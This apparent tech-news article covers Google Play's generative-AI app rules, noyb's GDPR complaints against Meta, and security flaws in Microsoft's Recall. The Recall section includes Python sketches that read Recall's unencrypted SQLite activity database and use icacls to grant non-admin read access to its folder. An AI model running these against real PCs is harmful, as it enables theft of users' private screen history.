Google has issued new guidelines encouraging Android app developers to incorporate generative artificial intelligence (GenAI) features responsibly.
The search and advertising giant’s guidance aims to curb inappropriate content, such as sexual material and hate speech, produced through these tools.
To that end, apps that use AI to generate content must avoid creating Restricted Content, provide a mechanism for users to report or flag offensive material, and be marketed in a way that accurately represents their capabilities. App developers are also advised to rigorously test their AI models to ensure they uphold user safety and privacy.
“Ensure you thoroughly test your apps in diverse user scenarios and protect them from inputs that could exploit the generative AI feature to create harmful or offensive content,” said Prabhat Sharma, director of trust and safety for Google Play, Android, and Chrome, in a statement.
This development follows an investigation by 404 Media that uncovered various apps on the Apple App Store and Google Play Store promoting the creation of non-consensual nude images.
Meta’s Use of Public Data for AI Raises Concerns
More broadly, the widespread adoption of AI technologies has raised concerns about privacy and security related to training data and model safety, which, as highlighted in a recent report, give malicious actors opportunities to extract sensitive data and manipulate models into producing unexpected outputs.
Additionally, Meta’s decision to improve its AI services by drawing on public data from its platforms to build what it describes as the “leading recommendation technology” has prompted the Austrian privacy group noyb to file complaints in 11 European countries, alleging violations of the region’s GDPR privacy laws.
“This data encompasses public posts, photos, and their associated captions,” the company revealed last month. “In the future, we may also utilize data shared by users during interactions with our generative AI features, such as Meta AI, or with businesses, to enhance and refine our AI products.”
Specifically, noyb has criticized Meta for shifting the burden onto users (making the processing opt-out rather than opt-in) and for failing to provide sufficient information about how customer data will be used.
Meta has indicated that it will be “relying on the legal grounds of ‘Legitimate Interests’ to process specific first and third-party data in the European Region and the United Kingdom to enhance AI capabilities and create better experiences.” E.U. users have until June 26 to opt out of this processing, which they can do by submitting a request.
Although the tech giant has stressed that its approach is in line with how other technology firms are improving their AI services in Europe, the Norwegian data protection authority Datatilsynet has expressed doubts about the legality of the process.
“It would have been more appropriate to seek consent from users before utilizing their posts and photos in this manner,” the agency said in a statement.
“Meta has no ‘legitimate interest’ to supersede users’ data protection rights when it comes to advertising, as confirmed by the European Court of Justice. Nevertheless, the company is attempting to leverage the same arguments for the training of unspecified ‘AI technology,’” said noyb’s Max Schrems.
Microsoft’s Recall Faces Heightened Scrutiny
Meta’s ongoing regulatory troubles come as Microsoft’s AI-powered Recall feature faces swift criticism over privacy and security concerns, owing to the fact that it captures screenshots of users’ activity on Windows PCs every five seconds and turns them into a searchable archive.
In a recent analysis, security researcher Kevin Beaumont outlined how a malicious actor could deploy an information stealer to extract and exfiltrate the database that holds the data parsed from the screenshots. The only requirement for pulling this off is administrator permissions on the user’s device.
“Recall provides threat actors the ability to automatically retrieve everything you’ve accessed within seconds,” Beaumont said, suggesting that Microsoft should recall Recall and revamp it so that it lives up to its potential, possibly releasing it at a later time.
Several researchers have also demonstrated tools like TotalRecall that show how Recall can be abused to extract highly confidential information from the database. “Windows Recall stores all data locally in an unencrypted SQLite database, with screenshots simply saved in a local folder,” noted Alexander Hagenah, the creator of TotalRecall.
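To illustrate the exposure Hagenah describes, here is a minimal sketch of querying such an unencrypted SQLite store with Python’s standard library. The database path, table, and column names are illustrative assumptions based on public write-ups, not Recall’s confirmed schema.

```python
# A minimal sketch of TotalRecall-style extraction against Recall's
# unencrypted SQLite store. The path, table, and column names below are
# illustrative guesses based on public write-ups, not a confirmed schema.
import sqlite3
from pathlib import Path

# Hypothetical location of the database; the GUID segment varies per machine.
db_path = Path.home() / "AppData/Local/CoreAIPlatform.00/UKP/{GUID}/ukg.db"

# The file is unencrypted, so any process that can read it can query it.
conn = sqlite3.connect(db_path)
rows = conn.execute(
    "SELECT TimeStamp, WindowTitle FROM WindowCapture ORDER BY TimeStamp"
)
for timestamp, window_title in rows:
    print(timestamp, window_title)
conn.close()
```

Because nothing in the file is encrypted, any code that can read it, including an information stealer running as the user, could run an equivalent query.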
As of June 6, 2024, TotalRecall has been updated so that it no longer requires admin privileges, using one of the approaches outlined by security researcher James Forshaw to bypass the requirement for administrator access to the Recall data.
“Currently, the data is only safeguarded by being access control list (ACL) restricted to SYSTEM, and thus any privilege escalation (or non-security boundary *cough*) can result in leaking the information,” Forshaw stated.
The two techniques Forshaw outlined involve impersonating a program named AIXHost.exe by acquiring its token, or taking advantage of the current user’s privileges to modify the access control lists and gain full access to the database, as sketched below.
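As a rough sketch of the second, ACL-modification route, and assuming the current user owns the files under their own profile (a file’s owner can generally rewrite its DACL without elevation), the built-in icacls utility can grant the user read access. The directory path below is illustrative, not Recall’s confirmed location.

```python
# Sketch of the ACL-modification approach: use the built-in icacls utility to
# grant the current user read access to the (hypothetical) Recall data folder.
# This assumes the user owns the files under their own profile, since a
# file's owner may rewrite its DACL without needing SYSTEM or admin rights.
import getpass
import subprocess

user = getpass.getuser()
# Illustrative path; the real location and folder names vary per machine.
ukp_dir = rf"C:\Users\{user}\AppData\Local\CoreAIPlatform.00\UKP"

# (OI)(CI)R = read access, inherited by files and subfolders; /T recurses.
subprocess.run(
    ["icacls", ukp_dir, "/grant", f"{user}:(OI)(CI)R", "/T"],
    check=True,
)
```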
That said, it is worth noting that Recall is still in preview, leaving room for Microsoft to make changes to the feature before it becomes broadly available to all users later this month. Recall is expected to be enabled by default on compatible Copilot+ PCs.